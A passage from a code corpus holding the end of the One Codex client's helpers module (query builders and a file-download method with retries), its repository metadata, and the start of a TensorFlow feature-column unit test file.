return base_class._resource._schema._uri.rstrip("#") + "/" + uuid
def coerce_search_value(search_value, field_name, base_class):
from onecodex.models import OneCodexBase # in here to prevent circular import
if field_name == "$uri":
return as_uri(field_name, base_class)
elif isinstance(search_value, OneCodexBase):
return {"$ref": search_value._resource._uri}
return search_value
def check_bind(self_or_cls):
if not hasattr(self_or_cls, "_resource"):
name = "class" if inspect.isclass(self_or_cls) else "instance"
raise UnboundObject("This {} is not associated with an API binding.".format(name))
def generate_potion_sort_clause(sort_items, sort_schema):
if sort_items is None:
return {}
if not isinstance(sort_items, list):
sort_items = [sort_items]
sort_clause = {}
for item in sort_items:
if item.lstrip("^") not in sort_schema:
raise AttributeError("Attribute {} can not be sorted on".format(item.lstrip("^")))
if item.startswith("^"):
sort_clause[item[1:]] = False
else:
sort_clause[item] = True
return sort_clause
def generate_potion_keyword_where(keyword_filters, where_schema, base_class):
where = {}
for keyword in keyword_filters:
search_value = keyword_filters[keyword]
if keyword == "id":
keyword = "$uri"
if keyword not in where_schema:
raise AttributeError(
"{} can not be searched on {}".format(base_class.__name__, keyword)
)
avail_searches = [v["required"] for v in where_schema[keyword]["anyOf"] if "required" in v]
# flatten the list
avail_searches = [item for sublist in avail_searches for item in sublist]
# TODO: do schema type checking here too?
if "$eq" not in avail_searches and "$containsall" in avail_searches:
if not isinstance(search_value, list):
search_value = [search_value]
where[keyword] = {
"$containsall": [coerce_search_value(v, keyword, base_class) for v in search_value]
}
elif isinstance(search_value, list):
where[keyword] = {
"$in": [coerce_search_value(v, keyword, base_class) for v in search_value]
}
else:
where[keyword] = coerce_search_value(search_value, keyword, base_class)
return where
def truncate_string(s, length=24):
if len(s) < length - 3:
return s
else:
s = s[0 : (length - 3)]
if s[-1] == ".":
s = s + ".."
else:
s = s + "..."
return s
class ResourceDownloadMixin(object):
def download(self, path=None, file_obj=None, progressbar=False):
"""Download files from One Codex.
Parameters
----------
path : `string`, optional
Full path to save the file to. If omitted, defaults to the original filename
in the current working directory.
file_obj : file-like object, optional
Rather than save the file to a path, write it to this file-like object.
progressbar : `bool`
Display a progress bar using Click for the download?
Returns
-------
`string`
The path the file was downloaded to, if applicable. Otherwise, None.
Notes
-----
If no arguments specified, defaults to download the file as the original filename
in the current working directory. If `file_obj` given, will write data into the
passed file-like object. If `path` given, will download the file to the path provided,
but will not overwrite any existing files.
"""
return self._download(
"download_uri",
self.filename,
use_potion_session=False,
path=path,
file_obj=file_obj,
progressbar=progressbar,
)
def _download(
self,
_resource_method,
_filename=None,
use_potion_session=False,
path=None,
file_obj=None,
progressbar=False,
):
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
if hasattr(self._resource, "visibility") and self._resource.visibility == "awaiting data":
raise OneCodexException("Sample has not finished processing. Please try again later.")
if path and file_obj:
raise OneCodexException("Please specify only one of: path, file_obj")
try:
method_to_call = getattr(self._resource, _resource_method)
download_link_info = method_to_call()
if path is None and file_obj is None:
if _filename is None:
if "save_as_filename" not in download_link_info:
raise OneCodexException(
"Please specify `path`, `file_obj`, or `_filename`."
)
_filename = download_link_info["save_as_filename"]
path = os.path.join(os.getcwd(), _filename)
if path and os.path.exists(path):
raise OneCodexException("{} already exists! Will not overwrite.".format(path))
if use_potion_session:
session = self._resource._client.session
else:
session = requests.Session()
link = download_link_info["download_uri"]
# Retry up to 5 times with backoff timing of 2s, 4s, 8s, 16s, and 32s (applies to all
# HTTP methods). 404 is included for cases where the file is being asynchronously
# uploaded to S3 and is expected to be available soon.
retry_strategy = Retry(
total=5,
backoff_factor=2,
status_forcelist=[404, 429, 500, 502, 503, 504],
method_whitelist=False,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
resp = session.get(link, stream=True)
with (open(path, "wb") if path else file_obj) as f_out:
if progressbar:
progress_label = os.path.basename(path) if path else self.filename
with click.progressbar(length=self.size, label=progress_label) as bar:
for data in resp.iter_content(chunk_size=1024):
bar.update(len(data))
f_out.write(data)
else:
for data in resp.iter_content(chunk_size=1024):
f_out.write(data)
except KeyboardInterrupt:
if path:
os.remove(path)
raise
except requests.exceptions.HTTPError as exc:
if exc.response.status_code == 401:
raise OneCodexException("You must be logged in to download files.")
elif exc.response.status_code == 402:
raise OneCodexException(
"You must either have a premium platform account or be in "
"a notebook environment to download files."
)
elif exc.response.status_code == 403:
raise OneCodexException("You are not authorized to download this file.")
else:
raise OneCodexException(
"Download failed with an HTTP status code {}.".format(exc.response.status_code)
)
return path
| {
"content_hash": "a109a6b2f3526dbed4fa524b8fcbf9d4",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 99,
"avg_line_length": 37.00471698113208,
"alnum_prop": 0.5697896749521989,
"repo_name": "refgenomics/onecodex",
"id": "e2740d3f04d16f6560cb0b5dc5a3ad68e5d09f12",
"size": "7845",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "onecodex/models/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33794"
},
{
"name": "Shell",
"bytes": "116"
}
],
"symlink_target": ""
} |
"""Tests for layers.feature_column_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python.layers import feature_column_ops
class TransformerTest(tf.test.TestCase):
def testRealValuedColumnIsIdentityTransformation(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = feature_column_ops._Transformer(features).transform(real_valued)
with self.test_session():
self.assertAllEqual(output.eval(), [[20.], [110], [-3]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = feature_column_ops._Transformer(features).transform(bucket)
with self.test_session():
self.assertAllEqual(output.eval(), [[2], [3], [0]])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 110], [110., 20], [-3, -3]])}
output = feature_column_ops._Transformer(features).transform(bucket)
with self.test_session():
self.assertAllEqual(output.eval(), [[2, 3], [3, 2], [0, 0]])
def testCachedTransformation(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
transformer = feature_column_ops._Transformer(features)
with self.test_session() as sess:
transformer.transform(bucket)
num_of_ops = len(sess.graph.get_operations())
# Verify that the second call to transform the same feature
# doesn't increase the number of ops.
transformer.transform(bucket)
self.assertEqual(num_of_ops, len(sess.graph.get_operations()))
def testSparseColumnWithHashBucket(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
self.assertEqual(output.values.dtype, tf.int64)
self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(
tf.contrib.layers.embedding_column(hashed_sparse, 10))
expected = feature_column_ops._Transformer(features).transform(
hashed_sparse)
with self.test_session():
self.assertAllEqual(output.values.eval(), expected.values.eval())
self.assertAllEqual(output.indices.eval(), expected.indices.eval())
self.assertAllEqual(output.shape.eval(), expected.shape.eval())
def testSparseColumnWithKeys(self):
keys_sparse = tf.contrib.layers.sparse_column_with_keys(
"wire", ["marlo", "omar", "stringer"])
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(keys_sparse)
with self.test_session():
tf.initialize_all_tables().run()
self.assertEqual(output.values.dtype, tf.int64)
self.assertAllEqual(output.values.eval(), [1, 2, 0])
self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())
def testSparseColumnWithHashBucket_IsIntegerized(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
"wire", 10)
wire_tensor = tf.SparseTensor(values=[100, 1, 25],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
output = feature_column_ops._Transformer(features).transform(hashed_sparse)
with self.test_session():
self.assertEqual(output.values.dtype, tf.int32)
self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())
def testCrossColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=15)
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output = feature_column_ops._Transformer(features).transform(
country_language)
with self.test_session():
self.assertEqual(output.values.dtype, tf.int64)
self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output = feature_column_ops._Transformer(features).transform(country_price)
with self.test_session():
self.assertEqual(output.values.dtype, tf.int64)
self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=15)
wire = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_country_price = tf.contrib.layers.crossed_column(
[wire, country_price], hash_bucket_size=15)
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [0, 1], [0, 2]],
shape=[1, 3])
}
output = feature_column_ops._Transformer(features).transform(
wire_country_price)
with self.test_session():
self.assertEqual(output.values.dtype, tf.int64)
self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))
def testIfFeatureTableContainsTransfromationReturnIt(self):
any_column = tf.contrib.layers.sparse_column_with_hash_bucket("sparse", 10)
features = {any_column: "any-thing-even-not-a-tensor"}
output = feature_column_ops._Transformer(features).transform(any_column)
self.assertEqual(output, "any-thing-even-not-a-tensor")
class InputLayerTest(tf.test.TestCase):
def testRealValuedColumn(self):
real_valued = tf.contrib.layers.real_valued_column("price")
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.],
[110, 0.],
[-3, 30]])}
output = tf.contrib.layers.input_from_feature_columns(features,
[real_valued])
with self.test_session():
self.assertAllClose(output.eval(), features["price"].eval())
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
# buckets [2, 3], [3, 2], [0, 0]. dimension = 2
features = {"price": tf.constant([[20., 200],
[110, 50],
[-3, -3]])}
output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
expected = [[0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 1, 0],
[1, 0, 0, 0, 1, 0, 0, 0]]
with self.test_session():
self.assertAllClose(output.eval(), expected)
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(output.eval().shape, [2, 10])
def testEmbeddingColumnWithInitializer(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
init_value = 133.7
embeded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10, initializer=tf.constant_initializer(init_value))
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.initialize_all_variables().run()
output_eval = output.eval()
self.assertAllEqual(output_eval.shape, [2, 10])
self.assertAllClose(output_eval, np.tile(init_value, [2, 10]))
def testEmbeddingColumnWithMultipleInitializers(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=42,
stddev=1337))
embedded_sparse_alternate = tf.contrib.layers.embedding_column(
hashed_sparse,
10,
initializer=tf.truncated_normal_initializer(mean=1337,
stddev=42))
# Makes sure that trying to use different initializers with the same
# embedding column explicitly fails.
with self.assertRaises(ValueError):
tf.contrib.layers.input_from_feature_columns(
features, [embedded_sparse, embedded_sparse_alternate])
def testSparseColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
with self.assertRaises(ValueError):
tf.initialize_all_variables().run()
tf.contrib.layers.input_layer(features, [hashed_sparse])
def testCrossedColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
with self.assertRaises(ValueError):
tf.initialize_all_variables().run()
tf.contrib.layers.input_layer(features, [crossed])
def testAllColumns(self):
real_valued = tf.contrib.layers.real_valued_column("income", 3)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"income": tf.constant([[20., 10, -5], [110, 0, -7], [-3, 30, 50]]),
"price": tf.constant([[20., 200], [110, 2], [-20, -30]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
10, initializer=tf.constant_initializer(133.7))
output = tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse])
with self.test_session():
tf.initialize_all_variables().run()
# size of output = 3 (real_valued) + 2 * 4 (bucket) + 10 (embedding) = 21
self.assertAllEqual(output.eval().shape, [3, 21])
def testInputLayerWithCollections(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
# one variable for embeded sparse
self.assertEqual(1, len(weights))
def testInputLayerWithTrainableArg(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"],
trainable=False)
# There should not be any trainable variables
self.assertEqual(0, len(tf.trainable_variables()))
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"],
trainable=True)
# There should one trainable variable for embeded sparse
self.assertEqual(1, len(tf.trainable_variables()))
class WeightedSumTest(tf.test.TestCase):
def testSparseColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testCrossedColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [crossed], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
with self.assertRaises(ValueError):
tf.initialize_all_variables().run()
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[embeded_sparse])
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [bucket], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testAllColumns(self):
real_valued = tf.contrib.layers.real_valued_column("income", 2)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
crossed = tf.contrib.layers.crossed_column([bucket, hashed_sparse], 100)
features = {
"income": tf.constant([[20., 10], [110, 0], [-3, 30]]),
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
output, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued, bucket, hashed_sparse, crossed],
num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(output.eval().shape, [3, 5])
def testPredictions(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[age, language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: 0.1 + age*0.1
sess.run(column_to_variable[age][0].assign([[0.2]]))
self.assertAllClose(output.eval(), [[0.3], [0.5]])
# score: 0.1 + age*0.1 + language_weight[language_index]
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.5], [0.6]])
def testPredictionsWithMultivalentColumnButNoCross(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
# score: 0.1 + language_weight['hindi'] + language_weight['english']
sess.run(bias.assign([0.1]))
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.4]])
def testSparseFeatureColumnWithHashedBucketSize(self):
movies = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="movies", hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"movies": tf.SparseTensor(
values=["matrix", "head-on", "winter sleep"],
indices=[[0, 0], [0, 1], [1, 0]],
shape=[2, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[movies],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[movies][0]
self.assertEqual(weights.get_shape(), (15, 1))
sess.run(weights.assign(weights + 0.4))
# score for first example = 0.4 (matrix) + 0.4 (head-on) = 0.8
# score for second example = 0.4 (winter sleep)
self.assertAllClose(output.eval(), [[0.8], [0.4]])
def testCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
self.assertAllClose(output.eval(), [[0.4], [0.4]])
def testCrossColumnByItself(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
language_language = tf.contrib.layers.crossed_column(
[language, language], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [language_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[language_language][0]
sess.run(weights.assign(weights + 0.4))
# There are two features inside language. If we cross it by itself we'll
# have four crossed features.
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictionsWithPartition(self):
# bucket size has to be big enough to allwo sharding.
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=64 << 19)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=64 << 18)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=64 << 18)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, language, country_language],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
self.assertEqual(2, len(column_to_variable[country]))
self.assertEqual(3, len(column_to_variable[language]))
self.assertEqual(2, len(column_to_variable[country_language]))
weights = column_to_variable[country_language]
for partition_variable in weights:
sess.run(partition_variable.assign(partition_variable + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[140.], [14.]])
def testMulticlassWithRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
